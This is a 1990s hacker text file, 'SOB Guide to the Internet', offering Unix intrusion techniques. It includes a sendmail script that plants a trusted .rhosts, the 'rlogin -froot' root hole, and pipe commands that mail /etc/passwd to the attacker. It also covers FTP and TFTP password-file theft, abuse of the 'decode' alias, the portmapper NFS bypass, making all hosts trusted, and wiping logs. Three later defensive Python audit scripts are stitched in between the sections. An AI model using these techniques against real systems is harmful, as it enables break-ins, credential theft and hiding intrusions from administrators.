SOB Guide to the Internet

By Syncomm [SOB]

"If god wanted the net to be secure he would have given it more Dan Farmers..." -Syncomm

-()- Introduction... -()-

The Internet is an immense place full of many kinds of sites that people used to spend whole lives scanning for the dialups to... It is also a foolish place full of bugs and careless sysadmins. One thing about the Internet is certain... it is one of the best places to hack! In this doc I'm not going to give you a STEP BY STEP guide on hacking out the interesting things you find on the "Information Super-Highway" (tm), due to the fact that hacking on the Internet can be an extremely involved process... I will however take a look at some of the major bugs and a lot of maneuvers that can still be used to attack most places on the net...

-()- A VERY Brief History... -()-

In the beginning the fools at the US Government made a big nationwide network. This in the end grew so large it split into two networks, ARPANET and MILNET. ARPANET was dedicated to scientific research and MILNET was dedicated to the communication of military sites... Later thousands of other networks joined and the Internet was born...

-()- The Legacy of RLOGIN -()-

"RLOGIN must have been designed by a hacker..." Crypt Keeper [SOB], P/S

One of the easier ways of getting an account on a remote system is to RLOGIN into it... if your system is trusted you can get in without a passwd (A lightbulb goes off in an empty skull somewhere...). The way to get a trusted account is to have your site listed in a user's .rhosts file, or in /etc/hosts.equiv, in a format like this...

    %cat .rhosts
    gnu.ai.mit.edu +
    %

The "+" designates this as a trusted site and it doesn't require a passwd when someone from the mentioned system logs into that account from a remote site. When you do get on a system I suggest you see what .rhosts files you have access to with the command...

    %find / -name .rhosts -exec /bin/cat {} ";"

That will give you a long list that you may want to edit in the future to "ensure" your access to the system. A good idea is to add a plus sign to the /etc/hosts.equiv file to make ALL hosts trusted; you should do this immediately after you gain root privileges.

One technique to make an .rhosts file on a remote site involves sendmail. Example:

    %cat evil
    # Evil Sendmail Script
    telnet site.name.com 25 << EOSM
    rcpt to:/home/name/.rhosts
    mail from: r3w+
    data
    (garbage)
    .
    rcpt to: /home/name/.rhosts
    mail from:r3w+
    data
    yoursite.name.com +
    .
    quit
    EOSM
    %/bin/sh evil
    Trying 666.666.666.1
    Connected to satan.com
    Escape character is '^]'.
    Connection closed by foreign host.
    %rlogin site.name.com -l account name
    -*- Welcome to satan.com -*-
    satan%

This trick works on all Sendmail previous to 5.59 from Berkeley. Another trick involving sendmail is to telnet to the site saying the mail is from "|/bin/echo "yoursite.name +" > /etc/hosts.equiv".

AIX and Linux can sometimes be exploited with a HUGE rlogin hole which has been patched on most systems. The format is:

    %rlogin site.name.com -l -froot
    -*- Welcome to site.name.com -*-
    site%tprof -x /bin/sh

This will give you root and allow you to edit all files. You may also want to take a look and make sure the system doesn't have an unpassworded "RSH" or remote shell...
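As an added defensive check (not part of this doc or the tools it mentions), here is a small audit that reads /etc/hosts.equiv and the .rhosts files and flags exactly the wildcard entries described above, so an admin can find them before someone else does. The sample entries are constructed, and audit_host() assumes home directories live under /home.

```python
"""Audit rlogin/rsh trust files for wildcard entries.

A "+" in the host field of /etc/hosts.equiv or ~/.rhosts trusts every host;
a "+" in the user field trusts every user on that host.  Added example,
not part of the original doc."""
import os
from typing import List, NamedTuple, Optional, Tuple

class Finding(NamedTuple):
    path: str
    lineno: int
    line: str
    reason: str

def parse_entry(line: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (host, user) for one trust line, or None for blank/comment lines."""
    body = line.split("#", 1)[0].strip()
    if not body:
        return None
    fields = body.split()
    return fields[0], (fields[1] if len(fields) > 1 else None)

def audit_trust_text(text: str, path: str) -> List[Finding]:
    """Flag every line that trusts any host, any user, or both."""
    findings: List[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        entry = parse_entry(raw)
        if entry is None:
            continue
        host, user = entry
        if host.startswith("-"):
            continue                      # negative entries deny, nothing to report
        if host == "+" and user == "+":
            reason = "any user from any host trusted"
        elif host == "+":
            reason = "any host trusted"
        elif user == "+":
            reason = "any user on %s trusted" % host
        else:
            continue
        findings.append(Finding(path, n, raw.strip(), reason))
    return findings

def audit_host(home_root: str = "/home", equiv: str = "/etc/hosts.equiv") -> List[Finding]:
    """Check hosts.equiv plus every readable ~/.rhosts under home_root (assumed layout)."""
    paths = [equiv]
    if os.path.isdir(home_root):
        paths += [os.path.join(home_root, d, ".rhosts") for d in os.listdir(home_root)]
    findings: List[Finding] = []
    for p in paths:
        try:
            with open(p) as fh:
                findings += audit_trust_text(fh.read(), p)
        except OSError:
            continue                      # missing or unreadable file: skip it
    return findings

# Constructed samples mirroring the entries this doc describes (not real hosts).
SAMPLE_RHOSTS = "gnu.ai.mit.edu +\nyoursite.name.com +\n# comment\ntrusted.example.org alice\n"
SAMPLE_EQUIV = "+\n-badhost.example.org\nbuild.example.org +\n"

if __name__ == "__main__":
    for f in audit_trust_text(SAMPLE_RHOSTS, "~/.rhosts") + audit_trust_text(SAMPLE_EQUIV, "/etc/hosts.equiv"):
        print(f"{f.path}:{f.lineno}: {f.reason}: {f.line}")
```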
I found a few systems that I was able to RSH into and snoop around gathering information that helped me hack them in the future.

-()- FTP and TFTP -()-

File Transfer Protocol has long been abused to get passwd files from hosts... an old bug that still pops up occasionally is "ftp -n".

    %ftp -n
    ftp> open site.name.com
    Connected to site.name.com
    220 site.name.com FTP server ready.
    ftp> quote user ftp
    331 Guest login okay, send ident as password.
    ftp> quote cwd ~root
    530 Please send login with USER and PASS.
    ftp> quote pass ftp
    230 Guest login okay, access restrictions apply.
    ftp>

If this works you are in as root and can modify all directories and files. Another FTP trick is to login as "anonymous" or "ftp" then send a file called .forward to the directory. The .forward file should contain "|/bin/mail you@yoursite.com < /etc/passwd". Now mail a letter to "ftp" or "anonymous" and you get the passwd file in your mailbox.

TFTP also has a huge bug on some systems. You almost never see this bug these days... but you never know!

    %tftp site.name.com
    tftp> get /etc/passwd

This will get you the actual passwd file on some systems...

-()- X Windows -()-

X Windows is a big risk due to the fact that displays can be monitored remotely... take a look at the xwatch.sh file that SHOULD have come with this doc...

-()- Sendmail -()-

A lot of versions before sendmail 5.59 had a bug in which you could specify your name as a "|" then a command... such as

    mail from: "|/bin/mail you@your.site.name < /etc/passwd"

Sendmail can also be helpful for finding users on a system with the 'expn' and 'vrfy' commands as follows...

    %telnet target.com 25
    Connecting to host target.com (666.666.666.1), port 25
    connection open
    220 target.com Sendmail 5.5/target ready at Sun, 7 July 94 18:00 PDT
    expn decode
    250 <"|/usr/bin/uudecode">
    quit

Finding the mail alias "decode" can provide you with a nice bug... with decode you can add a site name to nearly any account (depending on who owns the decode account). Ex.

    % echo "your.site.name" | uuencode /home/idiot/.rhosts | mail decode@target.com

-()- NIS -()-

NIS, NFS, and almost every other form of RPC is plagued with bugs... With the proper tools almost anyone can get a passwd file from a system running NIS. The popular way is to use YPX (tm), which should have come with this doc. There are other, better tools such as RPCToolKit and NFS (by Leendert) which allow easier handling of sites running RPC. One important thing to note is that the directory /var/yp contains the domain name of the host. So if the directory /var/yp is world readable or if /var is exported then you have the domain name.

Normally, a remote (network) file system is mounted by requesting the mount demon on the machine on which the file system resides to perform a mount RPC. The result of this RPC is the file handle of the root of the remote file system. As a security measure the mount demon checks the source machine of the request against a list of allowable machines (this list is found in /etc/exports). If the requester's machine is not in the export list, the mount RPC will of course fail. One could argue against the fitness of this security approach, but in common day practice it seems sufficient. However, a special feature of the portmapper (alias rpcbind) allows you to circumvent this check. The portmapper provides an indirect (or proxy) RPC service. This service is very simple, in that you provide the parameters of the RPC, send them to the portmapper and it will make the RPC call for you. This feature, as you by now probably have guessed, allows you to perform indirect RPC mount calls. Since the source of the request (from the mount demon's point of view) is its own local machine, such a request is often granted. This will only work if the local machine is mentioned in the export list for its own exportable file systems, but with netgroup facilities this is often the case.
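As an added toy model (not code from this doc or from Leendert's NFS program) of the export check and the proxy bypass just described: the mount demon only ever sees the caller's address, so a call relayed by the portmapper looks like it came from the server itself. The hostnames are constructed; forward_mount=False models a portmapper that refuses to proxy mount calls, and self_in_exports=False models an export list that does not name the server itself, which are the two fixes an admin has.

```python
"""Toy model of the mountd export check and the portmapper proxy bypass.
Added example: it models the decision logic only and speaks no real RPC."""
from typing import Dict, Optional, Set

class MountDaemon:
    """Toy mountd: hands out a file handle only if the caller is in the export list."""
    def __init__(self, hostname: str, exports: Dict[str, Set[str]]):
        self.hostname = hostname
        self.exports = exports          # export path -> hosts allowed to mount it
        self._next_handle = 0

    def mount(self, caller: str, path: str) -> Optional[int]:
        if caller not in self.exports.get(path, set()):
            return None                 # mount RPC fails for hosts not in /etc/exports
        self._next_handle += 1
        return self._next_handle        # stands in for the root file handle

class Portmapper:
    """Toy portmapper with the indirect (proxy) call feature."""
    def __init__(self, mountd: MountDaemon, forward_mount: bool):
        self.mountd = mountd
        self.forward_mount = forward_mount  # False models a hardened portmapper

    def callit(self, caller: str, prog: str, path: str) -> Optional[int]:
        if prog != "mountd" or not self.forward_mount:
            return None
        # The proxied call is issued by the portmapper itself, so mountd sees
        # its own host as the source and never learns who `caller` really was.
        return self.mountd.mount(self.mountd.hostname, path)

def scenario(forward_mount: bool, self_in_exports: bool) -> Dict[str, Optional[int]]:
    """Constructed hosts; the export list optionally contains the server itself,
    which is what a netgroup entry often does in practice."""
    allowed = {"client.example.org"}
    if self_in_exports:
        allowed.add("fs.example.org")
    mountd = MountDaemon("fs.example.org", {"/home": allowed})
    pm = Portmapper(mountd, forward_mount)
    return {
        "direct_from_outsider": mountd.mount("outsider.example.net", "/home"),
        "proxied_from_outsider": pm.callit("outsider.example.net", "mountd", "/home"),
        "direct_from_client": mountd.mount("client.example.org", "/home"),
    }

if __name__ == "__main__":
    for fwd, selfexp in [(True, True), (True, False), (False, True)]:
        print(f"forward_mount={fwd} self_in_exports={selfexp}:", scenario(fwd, selfexp))
```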
Note that when the mount call succeeds, we have a handle of the remote file system and there is no stopping us. Using this file handle we can perform NFS requests by directly addressing the remote NFS server. There is no need to go through the portmapper for this, since the NFS server doesn't do any further check if the requester can provide a good file handle. This gives us the advantage of providing our own Unix authentication information (something that can't be done using the portmapper's indirect RPC feature). This way it becomes possible to set the Unix user id. Both portmapper bugs are used in Leendert's program NFS, so they may be patched on some systems.

-()- Evasion -()-

It has always been a good idea to erase your tracks on a remote host... a simple way to get yourself out of the system logs (ie. the UTMP, WTMP, syslog, etc.) is to use a program called ZAP, which AGAIN should be included with this doc. NOTE: You must be root to use this program.

Be on the lookout for updates to this file on the following BBSs:

SOB MEMBER BOARDS

    Utopia                -*SOB WORLD HQ*-      (210) PRI-VITE
    Social Deception      -*SOB USHQ*-          (606) 261-3442
    Arrested Development  -*SOB Holland HQ*-    +31-77-547477
    Lucid Nightmare       -*SOB Eastern HQ*-    (703) 758-1655
    Celestial Woodlands   -*SOB Dist. S.*-      (409) 764-2843
    Purple Hell           -*SOB Dist. S.*-      (806) 791-0747
    Paradise Lost         -*SOB Dist. S.*-      (414) 476-3181
    Cyberspace.net        -*SOB I-Net Dist. S.*- /pub/SOB
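Looking back at the Sendmail and FTP sections, the "decode" alias and the planted ~/.forward both work the same way: a mail target that starts with "|" runs a program. As an added defensive check (not part of this doc), here is a parser for aliases(5) syntax that flags program, file and :include: targets in /etc/aliases and in .forward files; the sample alias file is constructed.

```python
"""Audit /etc/aliases and ~/.forward for targets that run a program or
write a file.  Added example, not part of the original doc."""
from typing import Dict, List, Tuple

def parse_aliases(text: str) -> Dict[str, List[str]]:
    """Parse 'name: target, target' lines, joining indented continuation lines."""
    joined: List[str] = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and joined:
            joined[-1] += " " + raw.strip()      # continuation of the previous alias
        else:
            joined.append(raw.rstrip())
    aliases: Dict[str, List[str]] = {}
    for line in joined:
        name, _, targets = line.partition(":")
        aliases[name.strip()] = [t.strip() for t in targets.split(",") if t.strip()]
    return aliases

def forward_targets(text: str) -> List[str]:
    """~/.forward holds the same target syntax without the 'name:' prefix."""
    lines = [l for l in text.splitlines() if l.strip() and not l.lstrip().startswith("#")]
    return [t.strip() for l in lines for t in l.split(",") if t.strip()]

def risky_targets(aliases: Dict[str, List[str]]) -> List[Tuple[str, str, str]]:
    """Flag every target that does something other than deliver to a mailbox."""
    out: List[Tuple[str, str, str]] = []
    for name, targets in aliases.items():
        for t in targets:
            bare = t.strip('"')
            if bare.startswith("|"):
                out.append((name, t, "runs a program"))
            elif bare.startswith("/"):
                out.append((name, t, "writes to a file"))
            elif bare.startswith(":include:"):
                out.append((name, t, "expands a list file; check who can write it"))
    return out

# Constructed sample alias file, not from any real host.
SAMPLE_ALIASES = """# aliases
postmaster: root
decode:     "|/usr/bin/uudecode"
archive:    /var/mail/archive
staff:      :include:/etc/staff-list
root:       ops,
            "|/usr/local/bin/pager"
"""
SAMPLE_FORWARD = '"|/bin/mail you@yoursite.com < /etc/passwd"\n'   # the .forward from the FTP section

if __name__ == "__main__":
    found = risky_targets(parse_aliases(SAMPLE_ALIASES))
    found += risky_targets({"~ftp/.forward": forward_targets(SAMPLE_FORWARD)})
    for name, target, why in found:
        print(f"{name}: {target} ({why})")
```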